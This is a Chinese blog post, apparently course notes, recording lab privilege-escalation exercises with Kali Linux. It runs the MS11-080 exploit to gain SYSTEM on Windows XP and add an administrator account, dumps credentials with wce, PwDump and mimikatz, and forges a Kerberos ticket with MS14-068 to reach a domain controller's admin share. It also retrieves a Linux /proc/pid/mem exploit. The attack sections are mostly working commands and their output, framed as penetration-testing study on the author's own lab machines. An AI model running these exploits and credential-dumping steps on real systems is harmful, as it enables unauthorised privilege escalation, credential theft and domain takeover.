Kali Linux渗透测试 046 利用漏洞提权

最新推荐文章于 2024-02-26 17:35:52 发布
最新推荐文章于 2024-02-26 17:35:52 发布
阅读量4.1k 收藏 11
点赞数 1
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79436234
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

  1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限
  2. Win7 使用 Ms14-068 获取 域控制器的权限
  3. 利用 CVE-2012-0056 提升 linux 权限

###1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限###

  1. Ms011-080 对应补丁 Kb2592799

    微软官网公告(https://technet.microsoft.com/library/security/ms11-080)

    在这里插入图片描述

     root@kali:~# searchsploit Ms11-080
 	------------------------------------------ --------------------------------
 	 Exploit Title                            |  Path
 	                                          | (/usr/share/exploitdb/)
 	------------------------------------------ --------------------------------
 	Microsoft Windows - 'AfdJoinLeaf' Local P | exploits/windows/local/21844.rb
 	Microsoft Windows XP/2003 - 'afd.sys' Loc | exploits/windows/local/18176.py
 	------------------------------------------ --------------------------------
 
 root@kali:~# cp /usr/share/exploitdb/exploits/windows/local/18176.py .
 
 # 将文件拷贝到 英文版 WinXP 系统(有时候中文版 XP 也可以使用)
 # 首先查看 WinXP 是否安装了 对应更新 Kb2592799
 WinXP -> 运行 -> appwiz.cpl -> 查看是否有安装 Kb2592799,有的话卸载掉

    在这里插入图片描述

     查看 WinXP下的文件路径

    在这里插入图片描述

    • WinXP 上安装的 python 的运行环境
      C:\Documents and Settings\kevin>cd \

        C:\>18176.py -O XP

      在这里插入图片描述

        启动任务管理器

      在这里插入图片描述

        结束 kevin 权限的 explorer 桌面程序

      在这里插入图片描述

        输入 explorer

      在这里插入图片描述

        启动 system 权限的 explorer 桌面程序

      在这里插入图片描述

    • WinXP 无需安装 Pyhon 的运行环境

        # 使用 python2 的 pyinstaller 将 python 文件进行打包
  root@kali:~# apt-get install python-pip
  root@kali:~# pip install pyinstaller
  # 或者 WinXP 下,安装 python2.7
  C:\>pyinstaller --onefile 18176.py
  	297 INFO: Building EXE from out00-EXE.toc
  	297 INFO: Appending archive to EXE C:\dist\18176.exe
  	328 INFO: Building EXE from out00-EXE.toc completed successfully.

      在这里插入图片描述

        # 打开文件目录,将文件复制到目标主机
  C:\>whoami
  	test
  C:\>net user test
  	本地组成员             *Users
  	全局组成员             *None
  # 查看文件位置

    在这里插入图片描述

     	C:\>cd 111
 	C:\111>18176.exe -O XP

    在这里插入图片描述

     	C:\WINDOWS\system32>whoami
 		SYSTEM
 	# 将自己添加为管理员组
 	C:\WINDOWS\system32>net localgroup administrators test /add
 		命令成功完成。

  2. 使用 Ms11-046 时目标主机蓝屏(Dos)

###2. Win7 使用 Ms14-068 获取 域控制器的权限 ###

安全脉搏链接(https://www.secpulse.com/archives/2874.html)

  1. 使用 win2003 搭建域控制器

    • 配置并连接域控制器

        # 运行 -> dcpromo

    在这里插入图片描述

     	# Win2003 设置成域控制器,配置静态 IP 地址
 	# Win2003 设置强密码
 	C:\>net user Administrator jlcssadmin2006...

 	# Win7 设置 静态 IP	并将 DNS 设置为 Win2003 的IP地址
 	# Win7 加入域控制器

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

     	# 重启之后

    在这里插入图片描述

    • 修改 Win2003 中的域控制器的用户权限
      # Win2003 -> 运行 -> dsa.msc
      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述

        # Win7

    在这里插入图片描述

     	# Win2003

    在这里插入图片描述

     	# Win7 可以查看域控制器共享出来的文件等资源

    在这里插入图片描述

  2. 使用漏洞代码攻击域控制器

    • 获取攻击文件

        # root@kali:~# searchsploit Ms14-068
  	------------------------------------------ ----------------------------------
  	 Exploit Title                            |  Path
                                | (/usr/share/					exploitdb/)
  	------------------------------------------ ----------------------------------
  	Microsoft Windows Kerberos - Privilege Es | exploits/windows/remote/35474.py
  	------------------------------------------ ---------------------------------
  root@kali:~# cp /usr/share/exploitdb/exploits/windows/remote/35474.py .

    • 域环境下使用通用工具查看本地密码

        C:\fgdump>PwDump.exe localhost	# 仅是本地密码
  C:\>wce-universal.exe	# 结果是域控制器密码
  C:\>wce-universal.exe -w
  	Administrator\LAB:jlcssadmin
  C:\Win32>mimikatz.exe
  mimikatz # ::
  mimikatz # privilege::debug
  	Privilege '20' OK
  mimikatz # kerberos::list
  mimikatz # sekurlsa::logonPasswords

    • 漏洞利用过程

        1. 首先在 kali 通过脚本生成一个票据文件
  	# ms14-068.py -u user@lab.com -s userSID -d dc.lab.com
  	-u 用户名:登录用户名
  	-s userSID
  	-d 域控制器名称:在 Win7 计算机名称处查看,不在域控是,可以用IP地址代替
  2. 将票据文件拷贝到 win 系统里
  	# 拷贝 TGT_user1@lab.com.ccache 到windows系统
  3. 在 win 系统里使用 mimikatz.exe 完成权限的提升
  	# mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit

  # 在 Win7 上使用本地用户登录
  # 查看域账号的信息
  C:\>net user
  	\\WIN7-VM 的用户帐户
  	Administrator            Guest                    John
  	user1                    user2
  	命令成功完成。
  C:\Win32>whoami.exe /all
  	[User]     = "LAB\user3"  S-1-5-21-3056505427-3800332898-2304591883-1111
  
  # kali 报错缺少模块
  root@kali:~# python 35474.py -u user3@lab.com -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132

  # 下载安装模块https://github.com/bidord/pykek

    在这里插入图片描述

     	root@kali:~/Desktop/pykek-master# python ms14-068.py -u user3@lab.com -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132
 	Password: 
 	  [+] Building AS-REQ for 172.16.10.132... Done!
 	  [+] Sending AS-REQ to 172.16.10.132... Done!
 	  [+] Receiving AS-REP from 172.16.10.132... Done!
 	  [+] Parsing AS-REP from 172.16.10.132... Done!
 	  [+] Building TGS-REQ for 172.16.10.132... Done!
 	  [+] Sending TGS-REQ to 172.16.10.132... Done!
 	  [+] Receiving TGS-REP from 172.16.10.132... Done!
 	  [+] Parsing TGS-REP from 172.16.10.132... Done!
 	  [+] Creating ccache file 'TGT_user1@lab.com.ccache'... Done		
 	# 将文件拷贝到 Win7

    在这里插入图片描述

     	# 在 Win7 下执行
 	C:\mimikatz\Win32>mimikatz.exe log "kerberos::ptc TGT_user3@lab.com.ccache" exit
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2019041316554383.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tldmluaGFuc2Vy,size_16,color_FFFFFF,t_70)
 	
 	# 如果injecte成功 你有可能获得到了域管理session,那么klist看一下是否有了kerberos Ticket
 	C:\mimikatz\Win32>klist
 		当前登录 ID 是 0:0x776bd
 		缓存的票证: (1)
 		#0>     客户端: user3 @ LAB.COM
 	        服务器: krbtgt/LAB.COM @ LAB.COM
 	        Kerberos 票证加密类型: RSADSI RC4-HMAC(NT)
 	        票证标志 0x50a00000 -> forwardable proxiable renewable pre_authent
 	        开始时间: 3/4/2018 2:00:45 (本地)
 	        结束时间:   3/4/2018 12:00:44 (本地)
 	        续订时间: 3/11/2018 2:00:44 (本地)
 	        会话密钥类型: RSADSI RC4-HMAC(NT)
 	C:\mimikatz\Win32>net use \\Win2003.lab.com\admin$
 		命令成功完成。

3. 利用 CVE-2012-0056 提升 linux 权限

  1. 是一个关于 /proc/pid/mem 的漏洞

  2. 要求:linux 内核必须大于2.6.39
    在这里插入图片描述

  3. 样例:使用 ubuntu11 系统

    ubuntu11 官网链接(http://old-releases.ubuntu.com/releases/11.10/)

  4. 在 kali 中查询

     root@kali:~# searchsploit 18411
 	--------------------------- ----------------------------------
 	 Exploit Title             |  Path
 	                           | (/usr/share/exploitdb/)
 	--------------------------- ----------------------------------
 	Linux Kernel 2.6.39 < 3.2. | exploits/linux/local/18411.c
 	--------------------------- -------------------------------
 root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/18411.c .

    在这里插入图片描述

     # 下载了 ubuntu11,安装之后 ssh 没办法使用,文件无法导入,故无法演示 ,过程是这样的,使用 kali-1.1.0 演示一下结果。
 # kali-1.1.0 已经打了这个漏洞的补丁了,故无结果。
网络安全打工人
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
kali里生成qt py程序出错
ayman_zawahiri的博客
06-07 134
解决办法:更 pip install --upgrade pyinstaller
渗透测试提权方式总结
qq_29864185的博客
07-06 1644
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
kali Linux 渗透系统的安装提权与汉化(初识 Linux 系统)
最新发布
Welcome To Myon'Blog !
02-26 2005
当然实 root 用户的权限其实远超 Windows 管理员的权限,拥有对系统的完全控制权。我这里推荐的是下载 vmx 文件,下载后解压,在 vmware 中打开即可直接开机使用。目前我们只是普通用户,该命令为超级用户才能执行的命令,因此命令前需要加上 sudo。如果你下载的是 iso 光盘镜像文件,则需要自己进行简单配置,都好弄,看个人喜好。那么需要修改 一个文件,在 /etc/passwd 的,关于这个方法我就不再演示。在这个情况下,我们就拥有了最高权限,可以执行任意命令,而不需要加 sudo。
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 976
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
渗透测试技术----提权(本地提权)
wwl012345的博客
07-22 2681
一、开启Kali共享文件夹(拓展,与提权无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
kali将python转为exe_Kali上的Pyinstaller为Windows XP创建exe - python
weixin_39636717的博客
11-26 241
我在Kali Linux 2上使用Pyinstaller创建.exe以在Windows XP上运行。到目前为止,pyinstaller可以成功创建可在Kali Linux上运行的.exe,但不能在Windows上运行这是python代码import webbrowserwebbrowser.open('http://www.cnn.com')这是我在Kali Linux上运行的命令~/Downlo...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
Kali Linux Web 无线渗透测试入门指南 中文版.rar
07-12
介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试。教程包括无线网络监听、信息收集、路由器渗透测试、客户端渗透测试四大部分。内容涉及网络扫描、Wireshark抓包分析、WPS/WEP/WPA/WAP+Radius...
Kali Linux 网络安全渗透测试
06-14
为什么学网络安全? 1. 市场巨大 每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。...注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。  
Web渗透测试使用Kali Linux
08-15
Kali Linux是专业的渗透测试和安全审计工具,是世界上最流行的开源渗透工具包BackTrack的继任者。本书是市面上第一本全面深入讲解Kali Linux工具包的专著,它注重实战、通俗易懂,强调换位思考,主张积极防御,是...
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2269
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
渗透测试提权指南
遇事不决冲冲冲
12-04 7196
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
从实践中学习Kali Linux渗透测试
qq_54480761的博客
01-15 1万+
目录 第一章 渗透测试概述 第二章 安装Kali Linux系统 第三章 配置Kali Linux 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
渗透测试提权
Forget_liu的博客
05-06 405
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。此时已经获得了站点的webshell权限,提权后获得服务器权限,就可以对站点B,C进行操作。
渗透测试——权限提升
世间繁华梦一出
03-01 1513
提权一、什么是提权二、怎样进行提权提权的方式有哪些)1、系统漏洞提权Linux、Windows) 一、什么是提权 提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件/服务提权 6、WebServer漏洞提权 1、系统
渗透测试提权-Liinux权限提升
LCW991207的博客
09-24 423
呕心沥血6个小时写成:非漏洞提权(suid,sudo,NFS,PATH,LD_PRELOAD,Cron,DOCKER,LXD)漏洞提权Linux内核提权漏洞
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
qwsn
07-04 2640
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值